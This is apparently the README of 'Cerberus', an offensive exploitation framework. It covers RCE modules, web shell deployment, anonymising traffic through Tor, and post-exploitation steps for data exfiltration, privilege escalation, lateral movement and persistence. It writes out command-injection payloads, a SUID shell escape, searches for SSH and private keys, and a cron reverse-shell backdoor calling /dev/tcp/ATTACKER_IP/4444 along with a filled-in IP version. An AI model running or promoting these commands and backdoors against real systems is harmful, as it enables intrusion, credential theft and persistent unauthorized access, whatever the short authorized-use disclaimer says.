Cerberus is a comprehensive, intelligent security assessment framework featuring advanced RCE exploitation, real command execution, and automated post-exploitation capabilities. This enhanced version represents a complete evolution from previous iterations with sophisticated exploitation techniques and intelligent vulnerability assessment.
Disclaimer: This tool is for authorized security testing, educational purposes, and professional penetration testing only.
git clone https://github.com/ekomsSavior/Cerberus.git
cd Cerberus
# Install dependencies
sudo apt update && sudo apt install tor
pip install requests pysocks urllib3 readline --break-system-packages
always start tor first
sudo systemctl start tor@defaultthen run Cerberus
sudo python3 cerberus.pyThe framework operates in interactive mode, guiding you through:
- Target Specification: IP/hostname and port configuration
- Scan Type Selection: Quick scan, full assessment, or specific module execution
- TOR Integration: Optional anonymous operations
- Automated Exploitation: Intelligent vulnerability detection and exploitation
- Post-Exploitation: Interactive menu for continued access and data exfiltration
- PHP Shell Deployment: Multiple shell types (basic, advanced, obfuscated, mini, base64)
- Deployment Methods: File upload, file write, log poisoning, template injection
- ASP/X Shells: Windows-specific web shell deployment
- Automated Testing: Shell functionality verification
- Spring RCE: Multiple CVE exploitation including Spring4Shell
- Laravel Exploitation: Debug mode RCE, token unserialization attacks
- WordPress Targeting: Vulnerable plugin detection and exploitation
- Authentication Bypass: Framework-specific credential testing
- Multi-Vector Attacks: JSON-RPC, REST API, command injection, deserialization
- Template Injection: SSTI, Jinja2, Twig exploitation
- Advanced Command Injection: Windows and Linux payload sets
- Intelligent Detection: Success validation and response analysis
- Web Service Attacks: Directory traversal, file inclusion, admin panel discovery
- FTP Exploitation: Anonymous access testing, credential brute forcing
- SSH Analysis: Common credential testing and service enumeration
- DNS Attacks: Zone transfer testing, recursion verification
- SMB/RDP: Anonymous share discovery, service vulnerability assessment
- Command Injection:
;command;,|command,`command`,$(command),||command,&&command - PHP Code Execution:
system(),exec(),shell_exec(),passthru(), backticks, base64 encoding - Template Injection: Jinja2, Smarty, Twig template engine exploitation
- Deserialization Attacks: PHP, Java, Python object injection
- SSRF Exploitation: Internal service access and command execution
Comprehensive parameter testing across:
ip,host,cmd,command,exec,system,query,inputdata,username,password,file,path,url,page,template
- Automated Detection:
find / -perm -4000analysis - Binary Exploitation: bash, dash, find, nmap, vim, less, more, awk, perl, python
- Exploit Payloads: Context-aware exploitation commands for each binary
- Permission Enumeration:
sudo -lanalysis and exploitation - Pattern Recognition: Automated detection of exploitable sudo configurations
- Privilege Escalation: Root access through misconfigured sudo rights
- Cron Job Examination:
/etc/cron*,/var/spool/cronanalysis - Capability Discovery:
getcap -r /capability enumeration - Writable File Identification: System file permission analysis
Status: FULLY FUNCTIONAL
- Once RCE is established, you get a fully working shell interface
- Execute any system commands directly on the compromised target
- Perfect for real-time exploration and manual testing
Status: FULLY FUNCTIONAL
- Automatically extracts and saves sensitive system files:
/etc/passwd,/etc/hosts,/proc/version- Network configurations and system information
- Creates timestamped reports with all extracted data
- Files saved as:
exfiltrated_data_[target]_[timestamp].txt
Status: FULLY FUNCTIONAL
- Live system reconnaissance:
- Kernel information:
uname -a - CPU and memory details:
cat /proc/cpuinfo,free -h - Disk usage:
df -h - Running processes:
ps aux - Current user context:
whoami && id
- Kernel information:
Status: CONDITIONAL (Depends on target system)
- Internal network mapping:
- Network interfaces:
ifconfig || ip addr - Routing tables:
route -n || ip route - ARP tables and active connections
- Network interfaces:
- Note: Requires basic networking tools on target system
Detection: FULLY FUNCTIONAL | Exploitation: GUIDED
- What Works Automatically:
- Finds all SUID binaries:
find / -perm -4000 - Checks sudo permissions:
sudo -l - Identifies cron jobs and capabilities
- Finds all SUID binaries:
- What Requires Manual Intervention:
- When exploitable binaries are found (bash, find, nmap, vim, etc.), Cerberus provides the exploitation commands
- You must manually execute the provided exploit commands in the interactive shell
- Example: If
/usr/bin/findis SUID, use:find . -exec /bin/sh \; -quit
Status: RECONNAISSANCE ONLY
- What Cerberus Provides:
- Finds potential lateral movement vectors:
- SSH keys:
find /home /root -name '.ssh' -type d - Private keys:
find / -name '*.pem' -o -name 'id_rsa' - Configuration files and credentials
- SSH keys:
- Finds potential lateral movement vectors:
- What You Need to Do:
- Manually use discovered SSH keys or credentials
- Set up SSH connections to other systems manually
- Configure tools like Metasploit or custom scripts for actual lateral movement
Status: TEMPLATE-BASED
- What Cerberus Provides:
- Persistence templates and concepts:
- Cron job backdoors
- Reverse shell persistence
- Service-based backdoors
- Persistence templates and concepts:
- What You Need to Do:
- Replace placeholders in persistence commands:
# CHANGE THIS: Cerberus provides template */5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' # TO THIS: You manually update with your IP */5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'
- Manually execute persistence commands in the interactive shell
- Verify backdoors are properly installed and working
- Replace placeholders in persistence commands:
- Run privilege escalation detection in Cerberus
- Copy the provided exploit commands
- Paste and execute them in the interactive shell
- Verify root access with
whoami
- Use Cerberus to find SSH keys and credentials
- Manually copy discovered keys to your attacker machine
- Use standard tools for lateral movement:
# Manual SSH with discovered key ssh -i discovered_key.pem user@internal_ip # Or use in Metasploit use auxiliary/scanner/ssh/ssh_login set RHOSTS internal_subnet set USERNAME discovered_user set KEY_PATH discovered_key.pem
- Get persistence templates from Cerberus
- Customize with your actual IP and ports
- Execute manually in the interactive shell
- Test persistence mechanisms from your machine
| Feature | Status | User Action Required |
|---|---|---|
| Interactive Shell | Full | None |
| Data Exfiltration | Full | None |
| System Recon | Full | None |
| Network Recon | Condt | None (if tools exist) |
| PrivEsc Detection | Full | None |
| PrivEsc Exploit | Guided | Manual command execution |
| Lateral Mvmt | Full | Manual exploitation |
| Prstst tmplt | Basic | Full customization |
- Start with the interactive shell - it's the most reliable feature
- Use data exfiltration first to understand the target environment
- For privilege escalation: Copy Cerberus findings and use them with tools like LinPEAS or manual exploitation
- For lateral movement: Combine Cerberus findings with standard penetration testing tools
- Always verify persistence mechanisms work before relying on them
- Text Reports: Detailed assessment findings with timestamps and evidence
- Structured Data: Machine-readable output for automation and analysis
- Evidence Archives: ZIP files containing extracted sensitive data and configurations
- Execution Logs: Complete exploitation timeline and methodology
- Automated Archiving: Structured evidence collection and preservation
- Credential Storage: Secure password and configuration data management
- SSH Key Repository: Extracted SSH keys and authorized_keys files
- Sensitive Data: Protected storage of exfiltrated information
This framework is intended exclusively for:
- Authorized penetration testing with written permission
** Cerberus Security Assessment & Exploitation**


